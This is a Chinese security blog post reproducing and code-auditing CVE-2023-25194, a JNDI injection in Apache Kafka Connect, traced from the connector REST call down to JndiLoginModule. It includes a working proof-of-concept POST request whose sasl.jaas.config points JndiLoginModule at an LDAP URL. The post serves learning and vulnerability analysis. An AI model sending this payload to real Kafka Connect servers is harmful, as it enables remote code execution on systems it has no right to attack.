0x00 前言
沉迷JNDI注入,看到kafka出现过JNDI注入,复现一波作为学习。首先介绍一个kafka,其项目的目标是为处理实时数据提供一个统一、高吞吐、低延迟的平台。由Scala和Java编写。简单来说就是一个分布式消息队列。一般用来缓存数据。这次复现的漏洞是CVE-2023-25194。影响版本是:2.4.0<=Apache kafka<=3.3.2
0x01 漏洞复现
直接按照语雀中提供的压缩包,启动即可
./bin/zookeeper-server-start.sh ./config/zookeeper.properties
./bin/kafka-server-start.sh ./config/server.properties
./bin/connect-standalone.sh ./config/connect-standalone.properties ./config/connect-file-source.properties ./config/connect-file-sink.properties
访问自己的http://127.0.0.1:8083/connector-plugins,可以返回红框中的插件就好
使用poc,可以触发计算器,database.password需要填写自己数据库的。
POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 811
{
"name": "debezium-test-50174",
"config": {
"connector.class": "io.debezium.connector.mysql.MySqlConnector",
"database.hostname": "127.0.0.1",
"database.port": "3306",
"database.user": "root",
"database.password": "Admin@123",
"database.server.id": "316545017",
"database.server.name": "test1",
"database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
"database.history.kafka.topic": "quickstart-events", "database.history.producer.security.protocol": "SASL_SSL",
"database.history.producer.sasl.mechanism": "PLAIN",
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://127.0.0.1:1389/xmzgie\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
}
}
0x02 配置环境
因为是参考了4rain师傅的文章,其中他说到作为connector的入口并不是漏洞的根源,但是本着刨根问底的精神,作为对自己的考验,我还依旧从HTTP请求作为入口进行分析。
既然是要代码审计动态调试也是少不了的,首先是开始debug模式,运行要运行三个Java程序,我们要在运行最后一个的时候开启。这里我先试用vscode打开目录找到bin/kafka-run-class.sh
文件。其原本的内容如下
在运行完,这两条指令之后
./bin/zookeeper-server-start.sh ./config/zookeeper.properties
./bin/kafka-server-start.sh ./config/server.properties
在该文件的开头添加一个export KAFKA_DEBUG=2
再执行就会开启一个5005端口的监听。
之后使用idea新建一个空的项目
打开新建的项目中,找到运行kafka的libs目录,并且导入,所有的jar包全部导入
然后新建Remote JVM的过程就不再赘述了,参考链接里有了。
0x03 代码审计 & 动态调试
思考一下怎么才能找到程序的入口呢?我这里想到了两种思路
-
HTTP发送给/connectors接口,直接全局去搜索
connectors
尝试找到。 -
该漏洞的特点是要新建一个Connector的过程中触发JNDI注入,实测的时候重复发送数据包的话会提示
Connector debezium-test-50150 already exists
-
already exists
就是关键字特征了,可以全局搜索,我就搜索到了一个AlreadyExistsException.class
-
下个断点看看呢?成功的可以断住。并且网上翻可以看到一个ConnectorsResource#createConnector
完全符合我们要找的方法的特征,这样就定位到了程序的入口。(PS:最好不要点击idea里的下载源代码,这可能会导致bytecode和sourcecode不匹配,然后debug的逻辑就会很混乱)。
这边根据我针对ConnectorsResource#createConnector
的调试,怎么都无法走到JNDI注入的位置,其实了解一些kafka中的概念的是知道,他是多线程进行处理的,所以我们发送HTTP的入口并不会直接一条线程就跟到JNDI注入的位置。发送的HTTP请求只是在线程池中新建了一个线程,而真正完成JNDI注入的是在另外一个线程中进行的(应该这样没错吧....说错了麻烦大佬指正,实在是太难了)。根据payload是想要新建一个io.debezium.connector.mysql.MySqlConnector
类的连接器。参考一位师傅关于自定义kafka的连接器的文章中写到,如果是SourceConnector
应该要拓展SourceTask
。
在io.debezium.connector.common
包下就找到了BaseSourceTask
这个类,并且这个类还存在start()
方法。
并且这里下断点是可以调试到的。终于找到了JNDI注入的入口位置,在BaseSourceTask#start
方法中最后会执行到this.coordinator = this.start(config);
。这里的this
是一个MySqlConnnector
。
就会跟进到MySqlConnnector#start
方法中
在这个方法中存在一行代码
public ChangeEventSourceCoordinator start(Configuration config) {
//code
this.schema = new MySqlDatabaseSchema(connectorConfig, valueConverters, topicSelector, schemaNameAdjuster, tableIdCaseInsensitive);
//跟进这个方法中
//code
}
MySqlDatabaseSchema
的构造方法中存在super
调用了父类的构造方法
public MySqlDatabaseSchema(MySqlConnectorConfig connectorConfig, MySqlValueConverters valueConverter, TopicSelector<TableId> topicSelector, SchemaNameAdjuster schemaNameAdjuster, boolean tableIdCaseInsensitive) {
super(connectorConfig, topicSelector, connectorConfig.getTableFilters().dataCollectionFilter(), connectorConfig.getColumnFilter(), new TableSchemaBuilder(valueConverter, schemaNameAdjuster, connectorConfig.customConverterRegistry(), connectorConfig.getSourceInfoStructMaker().schema(), connectorConfig.getSanitizeFieldNames()), tableIdCaseInsensitive, connectorConfig.getKeyMapper());
this.ddlParser = new MySqlAntlrDdlParser(valueConverter, this.getTableFilter());
this.ddlChanges = this.ddlParser.getDdlChanges();
this.filters = connectorConfig.getTableFilters();
}
其父类HistorizedRelationalDatabaseSchema
的构造方法代码如下
protected HistorizedRelationalDatabaseSchema(HistorizedRelationalDatabaseConnectorConfig config, TopicSelector<TableId> topicSelector, Tables.TableFilter tableFilter, Tables.ColumnNameFilter columnFilter, TableSchemaBuilder schemaBuilder, boolean tableIdCaseInsensitive, Key.KeyMapper customKeysMapper) {
super(config, topicSelector, tableFilter, columnFilter, schemaBuilder, tableIdCaseInsensitive, customKeysMapper);
this.databaseHistory = config.getDatabaseHistory();
this.databaseHistory.start(); //跟进这个函数
}
会进入到KafkaDatabaseHistory#start
KafkaDatabaseHistory#start
函数内容如下
public synchronized void start() {
super.start();
if (this.producer == null) {
this.producer = new KafkaProducer(this.producerConfig.asProperties());
//跟进到new KafkaProducer
}
}
new KafkaProducer()
代码
public KafkaProducer(Properties properties) {
this(propsToMap(properties), (Serializer)null, (Serializer)null, (ProducerMetadata)null, (KafkaClient)null, (ProducerInterceptors)null, Time.SYSTEM);
}
这里会执行this()继续跟进
KafkaProducer(Map<String, Object> configs, Serializer<K> keySerializer, Serializer<V> valueSerializer, ProducerMetadata metadata, KafkaClient kafkaClient, ProducerInterceptors interceptors, Time time) {
//code
//跟进这个方法
this.sender = this.newSender(logContext, kafkaClient, this.metadata);
//code
}
new Sender()
构造函数
Sender newSender(LogContext logContext, KafkaClient kafkaClient, ProducerMetadata metadata) {
//code
ChannelBuilder channelBuilder = ClientUtils.createChannelBuilder(this.producerConfig, this.time);
//code
}
跟进createChannelBuilder()
方法
public static ChannelBuilder createChannelBuilder(AbstractConfig config, Time time) {
//code
return ChannelBuilders.clientChannelBuilder(securityProtocol, Type.CLIENT, config, (ListenerName)null, clientSaslMechanism, time, true);
}
clientChannelBuilder()
public static ChannelBuilder clientChannelBuilder(SecurityProtocol securityProtocol, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, String clientSaslMechanism, Time time, boolean saslHandshakeRequestEnable) {
//code
return create(securityProtocol, Mode.CLIENT, contextType, config, listenerName, false, clientSaslMechanism, saslHandshakeRequestEnable, (CredentialCache)null, (DelegationTokenCache)null, time);
}
create()
private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism, boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache, Time time) {
//code
((ChannelBuilder)channelBuilder).configure(configs);
return (ChannelBuilder)channelBuilder;
}
configure()
跟进该方法
public void configure(Map<String, ?> configs) throws KafkaException {
//code
LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext)entry.getValue(), mechanism, defaultLoginClass, configs);
//code
}
acquireLoginManager()
public static LoginManager acquireLoginManager(JaasContext jaasContext, String saslMechanism, Class<? extends Login> defaultLoginClass, Map<String, ?> configs) throws LoginException {
//code
loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
//code
}
跟进到LoginManager
的构造函数
private LoginManager(JaasContext jaasContext, String saslMechanism, Map<String, ?> configs, LoginMetadata<?> loginMetadata) throws LoginException {
//code
this.login.login();
}
跟进login()
public LoginContext login() throws LoginException {
//code
this.loginContext.login();
log.info("Successfully logged in.");
return this.loginContext;
}
继续跟进LoginContext#login
public void login() throws LoginException {
//code
invokePriv(LOGIN_METHOD);
//code
}
LoginContext#invokePriv
,这里会进入invoke(methodName)
,而此时methodName
的内容是login
private void invokePriv(final String methodName) throws LoginException {
try {
java.security.AccessController.doPrivileged
(new java.security.PrivilegedExceptionAction<Void>() {
public Void run() throws LoginException {
invoke(methodName);
return null;
}
}, creatorAcc);
} catch (java.security.PrivilegedActionException pae) {
throw (LoginException)pae.getException();
}
}
于是这里就会执行到LoginContext#invoke
,这里会稍微有一些复杂,代码太长就贴图了。这里执行的是methods[mIndex].invoke(moduleStack[i].module, initArgs);
其实就是执行了JndiLoginModule#initialize
方法,参数是moduleStack[i].module
其中的内容存在user.provider.url
。然后会再次回到LoginContext#invoke
中会执行到
boolean status = ((Boolean)methods[mIndex].invoke
(moduleStack[i].module, args)).booleanValue();
那其实就是执行JndiLoginModule#login
查看login
函数的代码
public boolean login() throws LoginException {
//code
attemptAuthentication(false);
//code
}
最后到JndiLoginModule#attemptAuthentication
方法中存在漏洞的触发点。
最后贴一张调用栈的截图。
0x04 后记
尝试用CodeQL找到这条调用链,还没尝试,好难啊,感觉要长脑子了。
参考链接:
https://www.cnblogs.com/hetianlab/p/17247734.html
https://www.yuque.com/yuqueyonghukcxcby/wwdc80/yntiuyx4a6gnpn1z
https://xie.infoq.cn/article/ece8077adf7f6e8aaca047da9
https://segmentfault.com/a/1190000040790524
https://blog.csdn.net/daijiguo/article/details/108754054
https://blog.csdn.net/feeling890712/article/details/117659285
https://code-monkey.top/2020/03/10/Kafka-Connect%E7%AE%80%E4%BB%8B%E4%B8%8E%E9%83%A8%E7%BD%B2/